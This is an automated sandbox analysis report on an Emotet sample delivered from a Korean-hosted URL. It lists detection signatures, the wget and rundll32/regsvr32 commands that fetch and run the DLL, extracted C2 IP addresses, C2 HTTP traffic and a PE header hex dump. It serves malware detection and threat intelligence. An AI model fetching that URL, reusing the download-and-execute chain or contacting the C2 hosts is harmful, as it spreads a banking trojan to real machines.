Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV

Overview

General Information

Sample URL:http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV
Analysis ID:670809
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
DLL side loading technique detected
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 7080 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • loaddll64.exe (PID: 7124 cmdline: loaddll64.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 7132 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 7152 cmdline: rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 7140 cmdline: regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 4428 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 7160 cmdline: rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6348 cmdline: rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2576 cmdline: rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6072 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
{"C2 list": ["232.3.0.0:1", "112.194.0.0:443", "96.92.0.0:127", "68.211.2.0:5008", "208.100.90.0:1", "16.101.90.0:1", "56.211.2.0:4684", "4.1.0.0:92", "236.3.0.0:1", "67.211.2.0:4684", "80.100.90.0:1", "70.211.2.0:2752", "16.100.90.0:1", "192.3.0.0:1", "4.4.0.0:1", "72.211.2.0:2264", "208.109.90.0:1", "20.4.0.0:1", "32.4.0.0:1", "16.4.0.0:1", "36.4.0.0:1", "222.94.0.0:16", "74.211.2.0:3964", "208.99.90.0:1", "215.219.2.0:2976"]}
SourceRuleDescriptionAuthorStrings
00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            5.2.regsvr32.exe.14a0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.rundll32.exe.292f30b0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                5.2.regsvr32.exe.14a0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  7.2.rundll32.exe.292f30b0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    8.2.regsvr32.exe.450000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.645.55.191.130497764432404334 07/21/22-06:52:35.157478
                      SID:2404334
                      Source Port:49776
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.6213.239.212.5497794432404326 07/21/22-06:52:37.822577
                      SID:2404326
                      Source Port:49779
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcVVirustotal: Detection: 17%Perma Link
                      Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcVAvira URL Cloud: detection malicious, Label: malware
                      Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8Avira URL Cloud: Label: malware
                      Source: https://213.239.212.5/Avira URL Cloud: Label: malware
                      Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/Avira URL Cloud: Label: malware
                      Source: https://213.239.212.5/DAvira URL Cloud: Label: malware
                      Source: https://45.55.191.130/%I:Avira URL Cloud: Label: malware
                      Source: https://45.55.191.130/;Avira URL Cloud: Label: malware
                      Source: C:\Users\user\Desktop\download\NjszMzh0ar.dllReversingLabs: Detection: 84%
                      Source: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy)ReversingLabs: Detection: 84%
                      Source: 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["232.3.0.0:1", "112.194.0.0:443", "96.92.0.0:127", "68.211.2.0:5008", "208.100.90.0:1", "16.101.90.0:1", "56.211.2.0:4684", "4.1.0.0:92", "236.3.0.0:1", "67.211.2.0:4684", "80.100.90.0:1", "70.211.2.0:2752", "16.100.90.0:1", "192.3.0.0:1", "4.4.0.0:1", "72.211.2.0:2264", "208.109.90.0:1", "20.4.0.0:1", "32.4.0.0:1", "16.4.0.0:1", "36.4.0.0:1", "222.94.0.0:16", "74.211.2.0:3964", "208.99.90.0:1", "215.219.2.0:2976"]}
                      Source: unknownHTTPS traffic detected: 45.55.191.130:443 -> 192.168.2.6:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 213.239.212.5:443 -> 192.168.2.6:49779 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180032754 FindFirstFileExW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180032C30 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0049FEDC FindNextFileW,FindFirstFileW,

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.55.191.130 443
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 213.239.212.5 443
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.6:49776 -> 45.55.191.130:443
                      Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.6:49779 -> 213.239.212.5:443
                      Source: Malware configuration extractorIPs: 232.3.0.0:1
                      Source: Malware configuration extractorIPs: 112.194.0.0:443
                      Source: Malware configuration extractorIPs: 96.92.0.0:127
                      Source: Malware configuration extractorIPs: 68.211.2.0:5008
                      Source: Malware configuration extractorIPs: 208.100.90.0:1
                      Source: Malware configuration extractorIPs: 16.101.90.0:1
                      Source: Malware configuration extractorIPs: 56.211.2.0:4684
                      Source: Malware configuration extractorIPs: 4.1.0.0:92
                      Source: Malware configuration extractorIPs: 236.3.0.0:1
                      Source: Malware configuration extractorIPs: 67.211.2.0:4684
                      Source: Malware configuration extractorIPs: 80.100.90.0:1
                      Source: Malware configuration extractorIPs: 70.211.2.0:2752
                      Source: Malware configuration extractorIPs: 16.100.90.0:1
                      Source: Malware configuration extractorIPs: 192.3.0.0:1
                      Source: Malware configuration extractorIPs: 4.4.0.0:1
                      Source: Malware configuration extractorIPs: 72.211.2.0:2264
                      Source: Malware configuration extractorIPs: 208.109.90.0:1
                      Source: Malware configuration extractorIPs: 20.4.0.0:1
                      Source: Malware configuration extractorIPs: 32.4.0.0:1
                      Source: Malware configuration extractorIPs: 16.4.0.0:1
                      Source: Malware configuration extractorIPs: 36.4.0.0:1
                      Source: Malware configuration extractorIPs: 222.94.0.0:16
                      Source: Malware configuration extractorIPs: 74.211.2.0:3964
                      Source: Malware configuration extractorIPs: 208.99.90.0:1
                      Source: Malware configuration extractorIPs: 215.219.2.0:2976
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: m=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LZCx/zQGKWgzRZHDLgYA/eadm3uChEGtZAfPA0qXyIszplE5IkrOn/txpR2z567gQP5LblgXMN6wyYF1qhfvHost: 45.55.191.130Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: uhKAecyPEAU=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LQCQuyoXtQODjw6FmSNeA1Xr3LcEyw==Host: 213.239.212.5Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Jul 2022 04:51:53 GMTServer: Apache/2.2.15 (CentOS)Set-Cookie: 62d8db698429b=1658379113; expires=Thu, 21-Jul-2022 04:52:53 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Thu, 21 Jul 2022 04:51:53 GMTExpires: Thu, 21 Jul 2022 04:51:53 GMTContent-Disposition: attachment; filename="NjszMzh0ar.dll"Content-Transfer-Encoding: binaryContent-Length: 574464Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ef 34 f3 b7 ab 55 9d e4 ab 55 9d e4 ab 55 9d e4 78 27 9e e5 a7 55 9d e4 78 27 98 e5 2e 55 9d e4 78 27 99 e5 a7 55 9d e4 f9 20 98 e5 b4 55 9d e4 f9 20 99 e5 a5 55 9d e4 f9 20 9e e5 a2 55 9d e4 78 27 9c e5 ac 55 9d e4 ab 55 9c e4 d8 55 9d e4 6a 20 94 e5 af 55 9d e4 6a 20 9d e5 aa 55 9d e4 6a 20 62 e4 aa 55 9d e4 ab 55 0a e4 aa 55 9d e4 6a 20 9f e5 aa 55 9d e4 52 69 63 68 ab 55 9d e4 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 33 62 bb 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 f2 04 00 00 ea 03 00 00 00 00 00 f0 19 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 09 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 f0 05 00 ac 03 00 00 9c f4 05 00 50 00 00 00 00 90 06 00 b8 86 02 00 00 40 06 00 7c 38 00 00 00 00 00 00 00 00 00 00 00 20 09 00 0c 08 00 00 60 c1 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c1 05 00 38 01 00 00 00 00 00 00 00 00 00 00 00 10 05 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e5 f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 f0 00 00 00 10 05 00 00 f2 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 28 00 00 00 10 06 00 00 0e 00 00 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 7c 38 00 00 00 40 06 00 00 3a 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 80 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b8 86 02 00 00 90 06 00 00 88 02 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 08 00 00 00 20 09 00 00 0a 00 00 00 ba 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Jul 2022 04:52:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.55.191.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: unknownTCP traffic detected without corresponding DNS query: 213.239.212.5
                      Source: wget.exe, 00000002.00000002.382757981.0000000001195000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/
                      Source: wget.exe, 00000002.00000002.382757981.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8
                      Source: regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.467124834.0000000000607000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000008.00000003.471389369.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649755496.0000000000639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5/
                      Source: regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5/D
                      Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.55.191.130/
                      Source: regsvr32.exe, 00000008.00000003.471389369.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.467241295.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649762809.000000000063F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471509754.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.55.191.130/%I:
                      Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.55.191.130/;
                      Source: unknownDNS traffic detected: queries for: clotizen.dothome.co.kr
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_004A6628 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: m=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LZCx/zQGKWgzRZHDLgYA/eadm3uChEGtZAfPA0qXyIszplE5IkrOn/txpR2z567gQP5LblgXMN6wyYF1qhfvHost: 45.55.191.130Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: uhKAecyPEAU=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LQCQuyoXtQODjw6FmSNeA1Xr3LcEyw==Host: 213.239.212.5Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /members/lZTkIb3OkjcV/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: clotizen.dothome.co.krConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 45.55.191.130:443 -> 192.168.2.6:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 213.239.212.5:443 -> 192.168.2.6:49779 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 00000008.00000002.649302129.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.regsvr32.exe.14a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.292f30b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.14a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.292f30b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1ea80010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1ea80010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.400314253.00000000014D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.649048864.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.397309936.00000292F30E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\QKXGFEEVVr\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180030008
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014084
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180034D6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E11C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016144
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003A160
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001418C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180031F98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003B29C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800142A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F310
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001632C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180045360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800143AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800144C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D4D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A50C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002D574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800195BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800145D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003C60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000864C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003A690
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800136D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800146EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180032754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800367C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800137DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800147F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003F808
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800138FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015914
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014914
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016974
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E9D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800199E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013A04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014A1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015AFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013B20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003AB40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016B5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BBC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180043BCC
